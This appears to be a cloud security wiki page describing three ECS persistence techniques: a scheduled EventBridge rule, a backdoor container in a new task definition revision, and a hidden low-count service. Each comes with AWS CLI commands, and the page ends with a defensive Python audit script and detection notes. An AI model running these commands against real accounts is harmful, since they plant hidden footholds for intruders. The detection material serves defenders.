An attacker can create a hidden periodic ECS task by using an Amazon EventBridge schedule rule to run a malicious task definition at a fixed interval. The task can perform reconnaissance, exfiltrate data, or maintain persistence in the AWS account. On the defender's side, the three API calls involved (RegisterTaskDefinition, PutRule and PutTargets) are management events recorded in CloudTrail, and the rule itself is visible in `aws events list-rules` with an ECS target attached.
```bash
# Create a malicious task definition
aws ecs register-task-definition --family "malicious-task" --container-definitions '[
  {
    "name": "malicious-container",
    "image": "malicious-image:latest",
    "memory": 256,
    "cpu": 10,
    "essential": true
  }
]'

# Create an Amazon EventBridge rule to trigger the task periodically
aws events put-rule --name "malicious-ecs-task-rule" --schedule-expression "rate(1 day)"

# Add a target to the rule to run the malicious ECS task
aws events put-targets --rule "malicious-ecs-task-rule" --targets '[
  {
    "Id": "malicious-ecs-task-target",
    "Arn": "arn:aws:ecs:region:account-id:cluster/your-cluster",
    "RoleArn": "arn:aws:iam::account-id:role/your-eventbridge-role",
    "EcsParameters": {
      "TaskDefinitionArn": "arn:aws:ecs:region:account-id:task-definition/malicious-task",
      "TaskCount": 1
    }
  }
]'
```
Backdoor Container in Existing ECS Task Definition
TODO: Test
An attacker can add a stealthy backdoor container to an existing ECS task definition so that it runs alongside the legitimate containers. Registering the modified definition creates a new revision under the same family name, so the change is easy to overlook; the added container is marked non-essential, meaning that if it exits the task keeps running and the legitimate containers are unaffected. It can be used for persistence and for performing malicious activities. Comparing the container list of each task definition revision with the previous revision of the same family surfaces this kind of addition.
```bash
# Update the existing task definition to include the backdoor container
aws ecs register-task-definition --family "existing-task" --container-definitions '[
  {
    "name": "legitimate-container",
    "image": "legitimate-image:latest",
    "memory": 256,
    "cpu": 10,
    "essential": true
  },
  {
    "name": "backdoor-container",
    "image": "malicious-image:latest",
    "memory": 256,
    "cpu": 10,
    "essential": false
  }
]'
```
Undocumented ECS Service
TODO: Test
An attacker can create an undocumented ECS service that runs a malicious task. Keeping the desired task count at its minimum and leaving the container without a log configuration makes the service harder for administrators to notice. Services that were not created by the usual deployment pipeline still appear in `aws ecs list-services` for the cluster and as CreateService events in CloudTrail.
```bash
# Create a malicious task definition
aws ecs register-task-definition --family "malicious-task" --container-definitions '[
  {
    "name": "malicious-container",
    "image": "malicious-image:latest",
    "memory": 256,
    "cpu": 10,
    "essential": true
  }
]'

# Create an undocumented ECS service with the malicious task definition
aws ecs create-service --service-name "undocumented-service" --task-definition "malicious-task" --desired-count 1 --cluster "your-cluster"
```
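The three persistence techniques on this page (scheduled EventBridge rule with an ECS target, a container added to a new task definition revision, and a low-count service without logging) can be hunted for offline with one audit pass over the JSON that the AWS CLI already returns. The script below is an added example, not code from the original page. It assumes the record shapes of `aws events list-rules`, `aws events list-targets-by-rule`, `aws ecs describe-task-definition` and `aws ecs describe-services`; the sample records embedded in it are constructed for the demonstration (account `111111111111` and region `us-east-1` are placeholders), and in practice you would load the real CLI output instead.

```python
"""Offline audit for ECS persistence indicators (added example, not from the page).

Field names follow the AWS CLI JSON output; all sample data below is constructed.
"""

ACCOUNT, REGION = "111111111111", "us-east-1"  # placeholders, not real identifiers


def ecs_arn(resource):
    """Build a constructed ECS ARN for the sample records."""
    return f"arn:aws:ecs:{REGION}:{ACCOUNT}:{resource}"


# Shape of `aws events list-rules` -> "Rules"
RULES = [
    {"Name": "nightly-report", "State": "ENABLED", "ScheduleExpression": "cron(0 2 * * ? *)"},
    {"Name": "malicious-ecs-task-rule", "State": "ENABLED", "ScheduleExpression": "rate(1 day)"},
]

# Shape of `aws events list-targets-by-rule --rule NAME` -> "Targets", keyed by rule name
TARGETS_BY_RULE = {
    "nightly-report": [{"Id": "report-fn", "Arn": f"arn:aws:lambda:{REGION}:{ACCOUNT}:function:report"}],
    "malicious-ecs-task-rule": [{
        "Id": "malicious-ecs-task-target",
        "Arn": ecs_arn("cluster/your-cluster"),
        "RoleArn": f"arn:aws:iam::{ACCOUNT}:role/your-eventbridge-role",
        "EcsParameters": {"TaskDefinitionArn": ecs_arn("task-definition/malicious-task:1"), "TaskCount": 1},
    }],
}

# Shape of `aws ecs describe-task-definition` -> "taskDefinition", one entry per revision
LEGIT = {"name": "legitimate-container", "image": "legitimate-image:latest", "essential": True,
         "logConfiguration": {"logDriver": "awslogs"}}
TASK_DEFS = [
    {"family": "existing-task", "revision": 1, "taskDefinitionArn": ecs_arn("task-definition/existing-task:1"),
     "containerDefinitions": [LEGIT]},
    {"family": "existing-task", "revision": 2, "taskDefinitionArn": ecs_arn("task-definition/existing-task:2"),
     "containerDefinitions": [LEGIT, {"name": "backdoor-container", "image": "malicious-image:latest", "essential": False}]},
    {"family": "malicious-task", "revision": 1, "taskDefinitionArn": ecs_arn("task-definition/malicious-task:1"),
     "containerDefinitions": [{"name": "malicious-container", "image": "malicious-image:latest", "essential": True}]},
]

# Shape of `aws ecs describe-services` -> "services"
SERVICES = [
    {"serviceName": "web", "desiredCount": 3, "taskDefinition": ecs_arn("task-definition/existing-task:2")},
    {"serviceName": "undocumented-service", "desiredCount": 1, "taskDefinition": ecs_arn("task-definition/malicious-task:1")},
]


def scheduled_ecs_targets(rules, targets_by_rule):
    """Enabled schedule rules whose targets launch ECS tasks (EcsParameters present)."""
    hits = []
    for rule in rules:
        if rule.get("State") != "ENABLED" or not rule.get("ScheduleExpression"):
            continue
        for tgt in targets_by_rule.get(rule["Name"], []):
            ecs = tgt.get("EcsParameters")
            if ecs:
                hits.append((rule["Name"], rule["ScheduleExpression"], ecs["TaskDefinitionArn"]))
    return hits


def containers_added_between_revisions(task_defs):
    """Per family, containers that appear in a revision but not in the previous one."""
    by_family = {}
    for td in task_defs:
        by_family.setdefault(td["family"], []).append(td)
    hits = []
    for family, revs in by_family.items():
        revs.sort(key=lambda td: td["revision"])
        for prev, cur in zip(revs, revs[1:]):
            before = {c["name"] for c in prev["containerDefinitions"]}
            for c in cur["containerDefinitions"]:
                if c["name"] not in before:
                    # ECS treats a container as essential when the key is omitted
                    hits.append((family, cur["revision"], c["name"], c["image"], c.get("essential", True)))
    return hits


def unlogged_low_count_services(services, task_defs, max_count=1):
    """Services at or below max_count whose task has a container without logConfiguration."""
    by_arn = {td["taskDefinitionArn"]: td for td in task_defs}
    hits = []
    for svc in services:
        td = by_arn.get(svc["taskDefinition"])
        if svc["desiredCount"] > max_count or td is None:
            continue
        unlogged = [c["name"] for c in td["containerDefinitions"] if "logConfiguration" not in c]
        if unlogged:
            hits.append((svc["serviceName"], td["family"], unlogged))
    return hits


if __name__ == "__main__":
    for name, fn, args in [("scheduled ECS targets", scheduled_ecs_targets, (RULES, TARGETS_BY_RULE)),
                           ("containers added in a revision", containers_added_between_revisions, (TASK_DEFS,)),
                           ("low-count services without logging", unlogged_low_count_services, (SERVICES, TASK_DEFS))]:
        for hit in fn(*args):
            print(f"[{name}] {hit}")
```

Each finding is a lead to review, not proof of compromise: scheduled ECS tasks and single-task services are legitimate in many accounts, so the value is in diffing the results against what the deployment pipeline is expected to have created.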